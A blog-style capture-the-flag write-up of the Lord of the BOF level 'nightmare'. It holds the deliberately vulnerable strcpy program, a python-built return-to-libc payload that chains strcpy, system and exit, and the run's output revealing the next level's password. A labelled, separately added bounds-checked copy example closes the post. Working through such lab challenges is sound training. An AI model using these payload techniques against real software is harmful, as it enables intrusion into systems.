  • [lob] succubus -> nightmare
    Study/LOB 2015. 2. 19. 05:00


    [succubus@localhost succubus]$ cat nightmare.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - nightmare
            - PLT
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <dumpcode.h>

    main(int argc, char *argv[])
    {
        char buffer[40];
        char *addr;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
            printf("You must fall in love with strcpy()\n");
            exit(0);
        }

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
    }


    dummy 44 + strcpy + ret[aaaa] + [buffer + 48] + [source] + [system] + [exit] + [buffer+72] + "my-pass\x0"
    ./aaaaaaaaa `python -c 'print "a"*44 + "\x10\x84\x04\x08" + "bbbb" +"\xa0\xfa\xff\xbf" + "\xac\xfa\xff\xbf"+ "\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40" + "\xb8\xfa\xff\xbf" + "my-pass\x0"'`


    [succubus@localhost succubus]$ ./nightmare `python -c 'print "a"*44 + "\x10\x84\x04\x08" + "bbbb" +"\xb0\xfa\xff\xbf" + "\xbc\xfa\xff\xbf"+ "\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40" + "\xc8\xfa\xff\xbf" + "my-pass\x0"'`
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb°コÿ¿ɀσ@ɺÿ¿my-pass
    euid = 518
    beg for me
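
The defensive counterpart to the `strcpy(buffer, argv[1])` call in nightmare.c, as an added example that is not part of the original post or of the wargame source: a length-checked copy that rejects any argument that does not fit the 40-byte buffer, exercised against a stand-in frame. The names `copy_arg`, `struct frame` and `frame_intact_after_copy` are hypothetical, and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 40  /* same size as buffer[] in nightmare.c */

/* Constructed stand-in frame: buffer, then saved frame pointer + return address. */
struct frame {
    char buffer[BUF_SIZE];
    unsigned char saved[8];
};

/* Bounded replacement for strcpy(buffer, argv[1]). Returns 0 on success,
 * -1 if src plus its NUL does not fit; nothing past dst is ever written. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    const char *end;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    end = memchr(src, '\0', dst_size);  /* scans at most dst_size bytes */
    if (end == NULL) {                  /* no terminator within bounds: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Copies input into the stand-in frame, stores copy_arg's result in *rc and
 * returns 1 if the bytes above the buffer are unchanged, 0 otherwise. */
int frame_intact_after_copy(const char *input, int *rc)
{
    static const unsigned char marker[8] = {1, 2, 3, 4, 5, 6, 7, 8};
    struct frame f;
    memcpy(f.saved, marker, sizeof marker);
    *rc = copy_arg(f.buffer, sizeof f.buffer, input);
    return memcmp(f.saved, marker, sizeof marker) == 0;
}

int main(void)
{
    char long_input[80];  /* constructed: 79 filler bytes, longer than the buffer */
    int rc, ok;
    memset(long_input, 'a', sizeof long_input - 1);
    long_input[sizeof long_input - 1] = '\0';
    ok = frame_intact_after_copy("short argument", &rc);
    printf("short: rc=%d intact=%d\n", rc, ok);
    ok = frame_intact_after_copy(long_input, &rc);
    printf("long:  rc=%d intact=%d\n", rc, ok);
    return 0;
}
```
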
